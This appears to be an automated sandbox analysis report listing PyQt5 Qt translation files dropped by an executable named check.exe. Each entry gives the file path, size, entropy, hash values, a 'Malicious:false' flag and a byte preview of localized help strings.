                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......plB.....(.......0T....T.5w......Uj... R.`.......a[...............t............2.39....H......6.......n.B<s.. ...M^..._......6.O5^...F..)^......o>...............t.....D ......k.N.....k.N.../...n.......I...W..........2>...w................G.......w............&.......:..,................^...(..... ..$a....?.6.>...$..........K......W.b....._Xn......GN...Y..~......!.....*.K.H...E....."...pN...-.........P.~...}.o........(....1..~......s.>......%c.."..o.....r.z.q............................h................e.....i..#.......N.i.e.n.a.z.w.a.n.y..........Untitled.....QHelp.....P.N.i.e. .m.o.|.n.a. .s.k.o.p.i.o.w.a... .p.l.i.k.u. .z. .k.o.l.e.k.c.j...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....>.N.i.e. .m.o.|.n.a. .u.t.w.o.r.z.y... .k.a.t.a.l.o.g.u.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....H.N.i.e. .m.o.|.n.a. .u.t.w.o.r.z.y... .t.a.b.e.l. .w. .p.l.i.k.u. .%.1........... Cannot create tables in file

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_ru.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7288
                                                                                                                                                                                                                                      Entropy (8bit):5.297177914619657
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:dBJjvfq7D6X68uBAzlp5W9+yBPZZZMM7vL0PXJL:JKrMEL0PXJL
                                                                                                                                                                                                                                      MD5:794AF445A5D7082D51BD22683449F86D
                                                                                                                                                                                                                                      SHA1:3A0C369872B112A1572AA17EEB814B168B225D98
                                                                                                                                                                                                                                      SHA-256:557B644E6DA5F1EC720EF93965617087E4D1F40B2494CC5AA524CF3796108DE7
                                                                                                                                                                                                                                      SHA-512:D42C870A16AEE7626BBE24886AD423895529A2F1A51AC2DBC303BC0E4EF9D3241FE894ECA3F7217AD408C8DCEE165CA4B89D84570357B0EB80340A3F72B0A846
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ruB..........\.%.......0T......K:^.....Uj....L.`........YJ...X.E.4...............>............B<s.....B\>............+.s.....zq.......9....B..vR...L..@.......@....G..:......8Z......g.N......F....>...........t.....D ....R.k.N...E...I...W..^......`#....s..2.......G....^...N.........................K.......d..K............O..GN...b..NO.............K.H.............pN...P..V....................g..........>.............~........%c.....z.q....i........$...>.1.0.2.;.5.=.8.5. .D.8.;.L.B.@.0..........Add Filter.....FilterNameDialogClass.........<.O. .D.8.;.L.B.@.0.:..........Filter Name:.....FilterNameDialogClass.........5.7.K.<.O.=.=.K.9..........Untitled.....QHelp.....b...5. .C.4.0.;.>.A.L. .A.:.>.?.8.@.>.2.0.B.L. .D.0.9.;. .:.>.;.;.5.:.F.8.8. .A.?.@.0.2.:.8.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....<...5. .C.4.0.;.>.A.L. .A.>.7.4.0.B.L. .:.0.B.0.;.>.3.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....`

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_sk.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10388
                                                                                                                                                                                                                                      Entropy (8bit):4.70568613551943
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:uPq7iBWseXKkVu4+Qv9zEJ1xGMaLNmBgJqdC6/MxIMt:LWcseV04Xv9zEoLNDJqdX/MxRt
                                                                                                                                                                                                                                      MD5:75C94E59F1FC5312AE25381C247AF992
                                                                                                                                                                                                                                      SHA1:E3E5F4582CC5FAFE6DF43644D11484861023C084
                                                                                                                                                                                                                                      SHA-256:F41E33E1D790BD0D3EB180F1F875BC191FE74773628F25C2CAD95E1402E66867
                                                                                                                                                                                                                                      SHA-512:959B8F4D57FC9728DD4804322333D1792D45A0EE85615B559E0CA3BD2DEA22E2C8C68C6482AE9425D29C819B0ED27473EDDC82EF4B6ECFFB2E2E7B56E1509B63
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......sk_SKB...8.(.......0T......Uj......`.....0.a[....8..........t..............1"......39.......s........... .....%..........B<s...6..MQ..............J..$-.0.......O5Q......)Q...;..o>...........G...J..$......."....t.....8dz..#..D ......k.A...2.k.A.......n..._...I.................. ...21..........e.........G...!...w....Y...........!...........=...Q............$a......6.>.........."...K....i......# ._Xa..."..GA..............~.......TH..!{.K.H.."7.........pA..........%..P.~.....o........(..........!...~....u.s.1.....o.......z.q...c..............................f..e....9i..&-......(.D...v.o.d.o.m. .m...~.e. .b.y.e. .t.o.,. .~.e. .d.o.k.u.m.e.n.t...c.i.a. .s.t...l.e. .n.i.e. .j.e. .z.i.n.d.e.x.o.v.a.n.....).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......P.o.z.n...m.k.a.:..........Note:.....QCLuceneResultWidget.....".V...s.l.e.d.k.y. .h.>.a.d.a.n.i.a..........Search Results.....QCLuceneResultWidg

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_sl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10363
                                                                                                                                                                                                                                      Entropy (8bit):4.613473842638716
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:vNBqTi7qBCVIQf54EslZ2Jy/L/BnmpP0bX3caK6q1B6/hgIlCCUb0:vjq2+UVT4ESZOYmpP0bX26q1I/yqCCUw
                                                                                                                                                                                                                                      MD5:3B0AEE27B193A8A563C5CB5C7C4FE60F
                                                                                                                                                                                                                                      SHA1:C94E832595EC765370553468F87C02DB7E7D138A
                                                                                                                                                                                                                                      SHA-256:2EC955E662407EBCD8DCDAE5AAA21E4108E0B5B0AEE0E9DB712C27072943535F
                                                                                                                                                                                                                                      SHA-512:EBC25C378126876F44279E23CA0CF06FC9E7D5F51AD7E3DBDABA7A50C81112EDC1C76F7FD0AF47E447A93C3593BB953A0C9C1FBBFC49494E6B29BF21655F690E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......slB...8.(.....E.0T......Uj......`.......a[............!..t..............1"....;.39.......s....^............$........i.B<s...,..MQ..........}...J..#..0.....Z.O5Q...[..)Q......o>...............J..$I......"W...t...C.8dz..#H.D ......k.A.....k.A.......n.......I.................. P..21....................G...!...w............?...!...3...........Q...+........$a....>.6.>.........."...K...........".._Xa......GA..............~....A..TH..!I.K.H..!..........pA...>......%..P.~...>.o........(....d..... ...~......s.1.....o.......z.q.....................................e....{i..&.....z.(.R.a.z.l.o.g. .j.e. .m.o.r.d.a. .t.o.,. .d.a. .s.e. .d.o.k.u.m.e.n.t.a.c.i.j.o. .a.e. .v.e.d.n.o. .i.n.d.e.k.s.i.r.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......O.p.o.m.b.a.:..........Note:.....QCLuceneResultWidget.....".R.e.z.u.l.t.a.t.i. .i.s.k.a.n.j.a..........Search Results.....QCLuceneResultWidget.......R.e.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_tr.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4629
                                                                                                                                                                                                                                      Entropy (8bit):4.68793836539357
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:BoiK0UD2wMLb7Lqlguotqbww5BLNwWjK0kHU9zuQlUVUfniqthweEIFwC18lLEGA:PXFf7pU75BWWOpcJcVqDFNz8brgyf76r
                                                                                                                                                                                                                                      MD5:32D6EE3D8EE6408A03E568B972F93BCB
                                                                                                                                                                                                                                      SHA1:582EE079DBD42000C378E0701D26405750524DBA
                                                                                                                                                                                                                                      SHA-256:EBDECA0CFEE7A9441DEB800BABFD97C63BC4E421DA885C55B3BD49725EBACD25
                                                                                                                                                                                                                                      SHA-512:24AAA30B9CB4DB82A57411FBA24A87D70D8B845AE48A6FDA633D0BE6B824B58FDD2F450C2B385F16F49E2F9C6FA0A3124FD0F28594726940F996C66F8F3216CC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......tr_TRB.....%.....[.0T......Uj......`.....$..............L.B<s.....B\>..........4.+.s...............t.....D ......k.N...5...I......2.......G....5...N..........a...............f..K....9..........GN...........@.K.H..........q..pN...t..........>...z.~...../..%c.....z.q....i..........B.a._.l.1.k.s.1.z..........Untitled.....QHelp.....J.K.o.l.e.k.s.i.y.o.n. .d.o.s.y.a.s.1. .k.o.p.y.a.l.a.n.a.m.1.y.o.r.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....2.D.i.z.i.n. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....\.%.1. .d.o.s.y.a.s.1.n.d.a. .d.i.z.i.n. .t.a.b.l.o.l.a.r.1. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r...........&Cannot create index tables in file %1......QHelpCollectionHandler.....N.%.1. .d.o.s.y.a.s.1.n.d.a. .t.a.b.l.o.l.a.r. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r........... Cannot create tables in file %1......QHelpCollectionHandler.....P.S.q.l.i.t.e. .v.e.r.i.t.a.b.a.n.1. .s...r...c...

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_uk.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9750
                                                                                                                                                                                                                                      Entropy (8bit):5.281035122342072
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:eMp79BCN+u8hhbHbny+HJouHgei50JBSfDvbetpP/RIkT:eIhgNgBbny+phiS3SfDDetpP/RRT
                                                                                                                                                                                                                                      MD5:90A776917D534B65942063C319573CDC
                                                                                                                                                                                                                                      SHA1:5DF3B213D985A3BBDB476B37B7780D7D7DF17E41
                                                                                                                                                                                                                                      SHA-256:497CFC473684692EE44D7A3795E8FB2270C57069FD9EB98A615DD29AB9BE8A7C
                                                                                                                                                                                                                                      SHA-512:B34A019716B50CE8E1E20AC32756B3B0D5802971F7A04F4BDDE2418DA551AFB9742B79E934979DB6FAB9DAC05D7D26A3B19ABA77158321F8D9AAB08AEBBD455A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......uk_UAB...(.(.....?.0T......5w......Uj......`.......a[...............t............K.39....u....."..........B<s...8..M^...j......y...J..!..O5^...Y..)^......o>...o...J..":...... <...t...E.8dz..!3.D ....".k.N.....k.N...d...n.......I..............2>...>......o.........G.......w............E.......e..,................^...S........$a......6.>...'...... y..K........... ..W.b....._Xn......GN...p..~.......TH...4.!.....9.K.H.............pN..........#].P.~...~.o.....N..(....b.........~......s.>.....o.....o.z.q..........................U.h.............D..e.....i..#.......(...@.8.G.8.=.>.N. .F.L.>.3.>. .<.>.6.5. .1.C.B.8. .B.5.,. .I.>. .4.>.:.C.<.5.=.B.0.F.V.O. .4.>.A.V. .V.=.4.5.:.A.C.T.B.L.A.O...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........@.8.<.V.B.:.0.:..........Note:.....QCLuceneResultWidget.....". .5.7.C.;.L.B.0.B.8. .?.>.H.C.:.C..........Search Results.....QCLuceneResultWidget....... .5.7

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_zh_CN.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):6441
                                                                                                                                                                                                                                      Entropy (8bit):5.790303416386852
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:pB37nBD4H5PCyLDxLSzJPduYx9vja/FIgH9yIFqfs:rTZ4HUAD1S1JFe/F59PFqfs
                                                                                                                                                                                                                                      MD5:9297A6905B8B1823BF7E318D9138A104
                                                                                                                                                                                                                                      SHA1:3DB992A1B3BBCAF314B7EA4A000D6334D7492A52
                                                                                                                                                                                                                                      SHA-256:C02AAA20923F18ADDAB520BE5CB84EFD4C723396BDC24B4C9A72D406F101C7B4
                                                                                                                                                                                                                                      SHA-512:01F12CEE0AE456D78942A6049E1C77F94B406C8FFB4A5944DE15E54D1C760CDBA13279530A8F29B1443D1BBC647D3AF5436AAD8C43EB3944316C48300B3827E4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......zhB......I....L.0T......Uj......`.......a[...............t....P..@....Z.......<.........39.......s....2.................B<s......MQ..........9...J......31.....0.......O5Q......)Q...^..o>...........(...........J...V...........t.....8dz.....D ....Z.k.A.....k.A.......n.......I...........t..w................!...........o.......D...Q...E........$a......6.>...h...............%._Xa......GA..........._..TH...r.........pA.............P.~.....o.....].~.q.............~......o.....h.z.q...........H..0q....................i........2..S.u...y.`.Q.v.S.V.S..f/V.N:..e.hckcW(..}"_.0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..............Note:.....QCLuceneResultWidget......d.}"~.g...........Search Results.....QCLuceneResultWidget.....,d.}"~.g.N_..^vN.[.et..V.N:..e.hckcW(..}"_............VThe search results may not be complete since the documentation is still being indexed!.....QCLuceneResultWidget..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_zh_TW.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9301
                                                                                                                                                                                                                                      Entropy (8bit):5.80411750798786
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:4bgIXwsL78BQp4dRDP0ludqODa/wkB/tTWn5dJ6mO8IZiT9Dzz/wI3HyRWqUqS:lI/oS4dR5c/tTWn5/EZA9D/w+H8WqUqS
                                                                                                                                                                                                                                      MD5:47C3328D3918CF627112BB6C50E30B86
                                                                                                                                                                                                                                      SHA1:05705603AB3F28402A6C103E1C41DDFF21D140C0
                                                                                                                                                                                                                                      SHA-256:3697F1660D7F2AC9B37AC33CD1C7ECAE08ADBD26710E7E0076497CCDDC8BC830
                                                                                                                                                                                                                                      SHA-512:8DE1C3C5A48965CF6D8AA545DA9F0A5C00AE124F3E4153597915E7C0F4CAE1E26723270F58A47AA9FFA4AAF30E6EBA522D4EBAD27DECF17EF108E353E611980E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......zh_TWB......I....[.%.......0T......0T......Uj......Uj....R.`.....>.a[....................g..t....7..@......................39.......s................... .........B<s.....B<s.....B\>......MQ..........[...J...]..31.....+.s...c.0.....U.O5Q......)Q...C..o>.......................J...............t...3...t.....8dz.....D ....R.D ......k.A.....k.A.....k.N...'...n.......I.......I...........[..2....x..G........N......w................!...........:...........Q...&...............$a......6.>...I.......L.......$..K......................_Xa...y..GA...O..GN...........$..........TH...I.K.H................ Y..pA...K..pN.............P.~.....o.....D.~.q......>.............~......~........%c.. ..o.....!.z.q...........#..0q....................i..!Y....(..g.S..f/V.p.N.W(^.z.e.N.v.}"_.uvN-0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......P..;............Note:.....QCLuceneResultWidget......d.\.}Pg...........Sea

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_hu.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):146
                                                                                                                                                                                                                                      Entropy (8bit):3.6255640074603277
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/IrLlAlHekfK/gp1MUXaMlI+rwtbWlMiayIPldkOgn:CwDrC+TYIUrIRt6HoiHn
                                                                                                                                                                                                                                      MD5:5A46979B45C67DD6312F33CCEA2ED7BC
                                                                                                                                                                                                                                      SHA1:4C56836B1FB10D9903B299CBCB925947D515B4C8
                                                                                                                                                                                                                                      SHA-256:BB246AABD501E14CED8B1FFC1369E3D5D26567AAE62B3EAD4D94C22FB77C3471
                                                                                                                                                                                                                                      SHA-512:BDBA4E1731CF254E95B0F1337410937C765E96FBB1D42F1D053033E1511FEE6F50C02705F781F4DAA0347E2299DC78A5A9942AC4EA343ED1F8F401F9ACD961E4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......hu....v.....q.t.b.a.s.e._.h.u.....q.t.s.c.r.i.p.t._.h.u.....q.t.m.u.l.t.i.m.e.d.i.a._.h.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.h.u

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_it.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.5752972123113778
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/EbFlAlHeke5zOp1MUWLt7KlI+rwtbWlMj5FKIPldkOA9kk:CwDM+35aIUW5SIRt6Q50oi9Gk
                                                                                                                                                                                                                                      MD5:2BB8C94D420D3BC344C79A01043BDC89
                                                                                                                                                                                                                                      SHA1:3FBA773D58E6D3699C20AB41AEE6801E71E2DDAE
                                                                                                                                                                                                                                      SHA-256:9117AAC2D07BC86DFA55A29B8825ED27C7093300FCC90E143E135E00E85F09D7
                                                                                                                                                                                                                                      SHA-512:C6B13655AFB206B0056F5656B4A9BF33CC267FCC928F6973258131CFA6443970510226FE45A041E5AA988809E17D0B11C7458F4A241C71521EDED186596C6055
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......it....v.....q.t.b.a.s.e._.i.t.....q.t.s.c.r.i.p.t._.i.t.....q.t.m.u.l.t.i.m.e.d.i.a._.i.t... .q.t.x.m.l.p.a.t.t.e.r.n.s._.i.t.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_ja.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):146
                                                                                                                                                                                                                                      Entropy (8bit):3.599979504080125
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/il/lAlHekd6hY1MUV6JAlI+rwtbWlMgel3UlIPldkOG:Cwz4+pjUGAIRt6qVUloiB
                                                                                                                                                                                                                                      MD5:8A1EE3433304838CCD0EBE0A825E84D8
                                                                                                                                                                                                                                      SHA1:2B3476588350C5384E0F9A51FF2E3659E89B4846
                                                                                                                                                                                                                                      SHA-256:23457CE8E44E233C6F85D56A4EE6A2CECD87C9C7BDDE6D8B8A925902EED1CD9C
                                                                                                                                                                                                                                      SHA-512:2D8ACD668DF537E98B27161F9FA49828EB2EB6E9CF41DB38E7F5D31F610D150CD1B580A8AE9B472A4DFDE4D4BF983C24A56293BB911CF5879368664E4D4CF3D2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ja....v.....q.t.b.a.s.e._.j.a.....q.t.s.c.r.i.p.t._.j.a.....q.t.m.u.l.t.i.m.e.d.i.a._.j.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.j.a

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_ko.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):146
                                                                                                                                                                                                                                      Entropy (8bit):3.652277257665055
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/rrr/lAlHekcQ/01MUUQMlI+rwtbWlMhQGlIPldkORn:CwCC+1Q/UUpIRt6SBloimn
                                                                                                                                                                                                                                      MD5:7B2659AF52B824EAC6C169CDD9467EE9
                                                                                                                                                                                                                                      SHA1:5727109218B222E3B654A8CC9933E970EB7C2118
                                                                                                                                                                                                                                      SHA-256:4CC1AF37E771F0A43898849CFF2CD42A820451B8D2B2E88931031629D781DB05
                                                                                                                                                                                                                                      SHA-512:E9475AC80BDBBEFF54F2724A2B6BA76992F18FD1913FD8EE1540A99FD7A112B79FED5A130B6AC6D7460E4420C06354FC6E4CF7770A7C6CBD3EAC1BDAF0082DE5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ko....v.....q.t.b.a.s.e._.k.o.....q.t.s.c.r.i.p.t._.k.o.....q.t.m.u.l.t.i.m.e.d.i.a._.k.o... .q.t.x.m.l.p.a.t.t.e.r.n.s._.k.o

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_lt.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):165383
                                                                                                                                                                                                                                      Entropy (8bit):4.805977227348512
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:i5v3+zmayloj6yJjhnBAbnrKnGrhA7WgdXclIsooY9i:SvOzAloj6yJ9BA7riGr+7WKXc+s5ui
                                                                                                                                                                                                                                      MD5:8992B652D1499F5D2F12674F3F875A35
                                                                                                                                                                                                                                      SHA1:E22766A49612F79156C550D83C6C230345DDA433
                                                                                                                                                                                                                                      SHA-256:47EB5F97467DF769261421D54A5BEA1131C9FB9B6388791D38BB6574335B64BF
                                                                                                                                                                                                                                      SHA-512:9B8B6DBFF432F2A46C14BC183A6BAF84ACBF02BF2C5BB8C306C6538FBD9BE1C0A9015BD46728F2F652F9163AFC56B1E16D16EB95D8F7728F3C562AE9F4F1AE1E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ltB..0X...*..)C...+...|......P....@..9....A..9....B..:....C..:....D..;....E..;....F..<6...G..<....H..=)...I..=....P..>q...Q..>....R..?....S..@f...T..@....U..A\...V..B....W..B....X..C....Y..Cy...]..k....t..........t>......th......t.......pd...;..J'...;.._h...;.......;...{...;..J....;...)...M..l....O...R...O...............}..l9...m..lo......^S..(5..P{..+;..4...+;......+;......+O..4...+O......1...^...E@..?p..F...C...H4......HY......H.......I...D...I@..s...IA..t...IC...2..J.......J....Y..J.......J.......K...9...LD...`..L.......PS......R.......T...q...Zr...`..[`......[`..&@..\....e..\....b.._......._....P..1........E..........5........L..1...O...1...PP......7......../...........$.......$.......,.......y.......y..........K^..............x......8................L...E.......E.......E..*....................%..:....%.........0U.....W......Zo.....^....5.......0..I....0...F...0...|...0.......0.......0..+\...5...}.......... D...g.. D......+....j..,.......,.......<U...+..<U

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_lv.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):89
                                                                                                                                                                                                                                      Entropy (8bit):4.156834975253888
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/HzllldQlHekbxplUp1MUTJ+b:Cwv+DIUEb
                                                                                                                                                                                                                                      MD5:19F1B919BB531E9E12E7F707BEBD8497
                                                                                                                                                                                                                                      SHA1:46E82683CEA28D877C73A5CE02F965BB1130FC62
                                                                                                                                                                                                                                      SHA-256:03467738042A15676E504BA02CB326DCDB773B171FADA3CD62B7A0E0564314A0
                                                                                                                                                                                                                                      SHA-512:901D7B26CAC7A4D0FFDB39A1D25767B5BC71BED4AFBE788D70BF19D4C58A8295167111675AB45E743FDF4768AF874D69417414C01CF23D5C525A3F6C8BF7D21F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......lv....0.....q.t.b.a.s.e._.l.v.....q.t.s.c.r.i.p.t._.l.v........)....

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_pl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):161
                                                                                                                                                                                                                                      Entropy (8bit):3.8693516202048612
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/5J/p/lAlHekHp/7KlI+rwtbWlM6Tl/z21MUPp/FOlIPldkOjehB:Cwr+26IRt6nFURkloiT
                                                                                                                                                                                                                                      MD5:D71EA9FEFD97464B178235150EC8759E
                                                                                                                                                                                                                                      SHA1:61026FE602FD1B8B442A0D341C6BD759EEC75488
                                                                                                                                                                                                                                      SHA-256:BD7DD0C2CAB119A973DC10C3BFF7499D9728B928B541F86056921B30C8DB78E6
                                                                                                                                                                                                                                      SHA-512:ECD76A7D8B8D733E635B2BFEA90A4CD387B83D9D8A4EB6D299F59FF22AAA8D617A4C886A825A1CDDD901925C7839E2C18BDD4E0CD84152641922B66B62663F77
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......pl....v.....q.t.b.a.s.e._.p.l.....q.t.m.u.l.t.i.m.e.d.i.a._.p.l.....q.t.s.c.r.i.p.t._.p.l... .q.t.x.m.l.p.a.t.t.e.r.n.s._.p.l............,..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_pt.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):70334
                                                                                                                                                                                                                                      Entropy (8bit):4.732724622610353
                                                                                                                                                                                                                                      Encrypted:false
